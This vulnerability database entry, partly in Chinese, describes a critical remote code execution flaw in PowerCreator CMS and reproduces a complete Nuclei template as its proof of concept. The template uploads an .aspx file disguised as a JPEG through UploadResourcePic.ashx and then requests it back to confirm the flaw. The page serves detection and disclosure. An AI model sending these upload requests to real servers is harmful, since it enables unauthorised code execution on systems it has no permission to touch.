powercreator-cms-rce: PowerCreator CMS - Remote Code Execution

日期: 2025-08-01 | 影响软件: PowerCreator CMS | POC: 已公开

漏洞描述

PowerCreator CMS is susceptible to a remote code execution vulnerability.

PoC代码[已公开]

id: powercreator-cms-rce

info:
  name: PowerCreator CMS - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: |
    PowerCreator CMS is susceptible to a remote code execution vulnerability.
  reference:
    - https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/PowerCreatorCms/PowerCreatorCms%E4%BB%BB%E6%84%8F%E4%B8%8A%E4%BC%A0/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 2
  tags: rce,powercreator,intrusive,fileupload

http:
  - raw:
      - |
        POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1
        Host: {{Hostname}}
        Content-Disposition: form-data;name="file1";filename="poc.aspx";
        Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136

        -----------------------------20873900192357278038549710136
        Content-Disposition: form-data; name="file1"; filename="poc.aspx"
        Content-Type: image/jpeg

        {{randstr}}
        -----------------------------20873900192357278038549710136--
      - |
        GET /ResourcePic/{{endpoint}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: endpoint
        internal: true
        part: body
        regex:
          - "(.*?.ASPX)"
    matchers:
      - type: dsl
        dsl:
          - "contains(body_2, '{{randstr}}') && status_code_2 == 200"
# digest: 490a00463044022003a0311973467ae41b382cd8b13558b6e9b2cf4a5d0f9db3a51cccdc1202ce5102203add6cd7425cef99dbb097f174bf8a8ba70a18c9df36312a3aede896a0cfb97a:922c64590222798bb761d5b6d8e72950

相关漏洞推荐